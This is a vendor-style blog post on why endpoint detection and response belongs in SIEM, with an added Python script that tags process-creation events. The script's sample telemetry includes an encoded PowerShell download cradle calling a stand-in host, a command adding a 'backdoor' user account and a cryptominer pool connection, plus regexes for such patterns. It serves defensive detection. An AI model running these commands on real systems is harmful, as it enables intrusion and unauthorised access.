When we talk about cybersecurity and best practices, we tend to treat the different branches as if they belong in separate conversations. Endpoint security, as one example, offers firewalls, port controls, and EDR. SIEM, as another, provides threat detection, log management, and compliance reporting. The two offer separate functions and capabilities and may seem quite unrelated to one another.
However, drawing that distinction too sharply blurs their common purpose and obscures the importance of a holistic cybersecurity platform in the enterprise network. Cybersecurity solutions perform best when they integrate effectively with each other and draw on each other's capabilities. To illustrate, SIEM works best when it incorporates or outright provides endpoint detection and response (EDR), a function typically delivered by endpoint security solutions.
Why should SIEM incorporate EDR? What kinds of threats can EDR help prevent or mitigate? How does EDR supplement threat detection? To gain some insight, we read through the “Five Endpoint Attacks Your Antivirus Won’t Catch: A Guide to Endpoint Detection and Response” white paper by SIEM solution provider AlienVault. You can download the white paper for yourself here.
EDR and Threat Detection Begins at the Endpoint
For the uninitiated, endpoint security and SIEM solutions use EDR as a threat detection tool on the endpoint. Think of it as a safety net: it continuously records what happens on the endpoint (process launches and their command lines, network connections, file and registry changes, logons) and raises an alert when a threat gets past the initial preventive security perimeter.
AlienVault notes that threats begin at the endpoint, and for good reason: endpoints are the primary point of entry into the network, giving attackers a foothold from which to launch the rest of the attack. EDR helps secure these endpoints so they don't hand threat actors that advantage.
So threat detection can't be confined to the network level; it needs to reach the endpoint. That's where EDR comes in. But why can't traditional endpoint security adequately protect against modern threats?
EDR Steps Up Where Traditional EPP Fails
AlienVault cites the Ponemon Institute's finding that 77% of all reported endpoint compromises in 2017 began with a fileless malware attack. Fileless malware abuses the endpoint's own legitimate processes and tools (PowerShell, WMI, Office macros, in-memory code injection) rather than dropping an executable to disk, so there is no file for a signature scanner to match.
Traditional endpoint security, built around scanning files for known signatures, lacks the preventive and detection capabilities to handle fileless attacks. The same applies to other popular and dangerous modern threats such as cryptojacking malware and remote session hijacking: a file scanner has nothing to match against a legitimate process that has been repurposed to mine cryptocurrency, or against an attacker riding an already-authenticated session. Without EDR, such threats penetrate and infiltrate your network with relative impunity.
Furthermore, attackers have become more subtle and design their tooling to evade detection. Lateral movement using stolen credentials and built-in administration channels (PsExec, WMI, WinRM, RDP) looks like routine administration to a per-host prevention product that sees only one machine at a time, and it gives attackers broader access into your network and endpoints.
Endpoint detection and response, on the other hand, can monitor for, detect, and remediate threats like fileless malware and cryptojacking because it judges a process by its behavior and lineage rather than by a file on disk. It can also see through evasive tactics and recognize concealed threats in near real time, particularly when telemetry from many endpoints is correlated in one place.
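The following is an added example, not code from the white paper or from AlienVault, of the kind of behavioral logic an EDR applies to process-creation telemetry and a SIEM then correlates across hosts. It covers the three threat classes discussed above: a fileless PowerShell download cradle launched from Office, a cryptominer identified by its command line rather than its file hash, and lateral movement inferred from one account executing through remote channels (WMI, PsExec) on several hosts within a short window. The host names, account names, command lines and timestamps are constructed for the example; the indicator lists are illustrative, not a complete rule set.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Parents that mean the child was started through a remote-execution channel
# (WMI provider host, PsExec service, WinRM) rather than by an interactive user.
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "psexesvc.exe", "winrshost.exe", "wsmprovhost.exe"}
PS_DOWNLOAD_CRADLE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|frombase64string|net\.webclient", re.I)
PS_STEALTH_FLAGS = re.compile(r"-(nop|noprofile|w(indowstyle)?\s+hidden|noni|noninteractive)\b", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
MINER_INDICATORS = re.compile(r"stratum\+tcp://|xmrig|--donate-level|cryptonight", re.I)
LATERAL_WINDOW = timedelta(minutes=10)

# Constructed sample telemetry (Sysmon event 1 / EDR process-creation style).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()  # how -EncodedCommand is built
EVENTS = [
    {"ts": "2019-02-15T09:00:01", "host": "ws-01", "user": "corp\\alice", "parent": "WINWORD.EXE",
     "image": "powershell.exe", "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ts": "2019-02-15T09:00:30", "host": "ws-01", "user": "corp\\alice", "parent": "explorer.exe",
     "image": "chrome.exe", "cmdline": "chrome.exe --profile-directory=Default"},
    {"ts": "2019-02-15T09:02:10", "host": "srv-02", "user": "corp\\svc_admin", "parent": "WmiPrvSE.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c net user backdoor P@ssw0rd /add"},
    {"ts": "2019-02-15T09:05:42", "host": "srv-03", "user": "corp\\svc_admin", "parent": "PSEXESVC.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2019-02-15T09:06:00", "host": "srv-03", "user": "SYSTEM", "parent": "services.exe",
     "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"ts": "2019-02-15T09:07:15", "host": "ws-07", "user": "corp\\bob", "parent": "explorer.exe",
     "image": "updater.exe", "cmdline": "updater.exe -o stratum+tcp://pool.example.invalid:3333 -u 4Awallet"},
    {"ts": "2019-02-15T09:08:00", "host": "ws-04", "user": "corp\\carol", "parent": "cmd.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -Command Get-Process"},
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument (UTF-16LE base64), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev):
    """Tag one process-creation event by behavior; no file hash is consulted anywhere."""
    tags = []
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        tags.append("OFFICE_SPAWN")          # document spawning a script host: macro-driven fileless delivery
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd) or ""
        if (PS_DOWNLOAD_CRADLE.search(cmd) or PS_DOWNLOAD_CRADLE.search(decoded)
                or (decoded and PS_STEALTH_FLAGS.search(cmd))):
            tags.append("FILELESS_PS")       # in-memory download cradle, nothing written to disk
    if MINER_INDICATORS.search(cmd):
        tags.append("CRYPTOMINER")           # cryptojacking: the binary is unknown, the pool protocol is not
    if parent in REMOTE_EXEC_PARENTS:
        tags.append("REMOTE_EXEC")           # started via WMI/PsExec/WinRM from another host
    return tags


def find_lateral_movement(events):
    """One account executing through remote channels on >= 2 hosts within LATERAL_WINDOW."""
    by_user = defaultdict(list)
    for ev in events:
        if "REMOTE_EXEC" in classify(ev):
            by_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), ev["host"]))
    alerts = []
    for user, hits in by_user.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            hosts = {h for t, h in hits[i:] if t - t0 <= LATERAL_WINDOW}
            if len(hosts) >= 2:
                alerts.append({"user": user, "hosts": sorted(hosts)})
                break
    return alerts


def detect(events):
    """Per-host EDR verdicts plus the cross-host correlation a SIEM adds on top."""
    per_event = [(ev["host"], ev["image"], classify(ev)) for ev in events]
    return {"events": [a for a in per_event if a[2]],
            "lateral_movement": find_lateral_movement(events)}


if __name__ == "__main__":
    result = detect(EVENTS)
    for host, image, tags in result["events"]:
        print(f"{host}: {image} -> {', '.join(tags)}")
    for alert in result["lateral_movement"]:
        print(f"lateral movement: {alert['user']} on {alert['hosts']}")
```

The per-event rules are what an EDR agent evaluates on the box; the lateral-movement rule is the part that only works once every host's telemetry lands in one store, which is the argument for putting EDR inside the SIEM rather than beside it. Note that the benign PowerShell invocation on ws-04 produces no tag: the rules key on download cradles, hidden-window flags and encoded commands, not on PowerShell itself.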
EDR in SIEM
EDR should be considered a critical part of your SIEM solution's threat detection capabilities; you need that extra layer of detection on your corporate endpoints to keep them secure and functioning optimally, and feeding EDR telemetry into the SIEM is what lets alerts from separate endpoints be correlated into a single picture of an attack.
To learn more about EDR in SIEM, you can download the “Five Endpoint Attacks Your Antivirus Won’t Catch: A Guide to Endpoint Detection and Response” white paper by SIEM solution provider AlienVault.
Posted by Ben Canner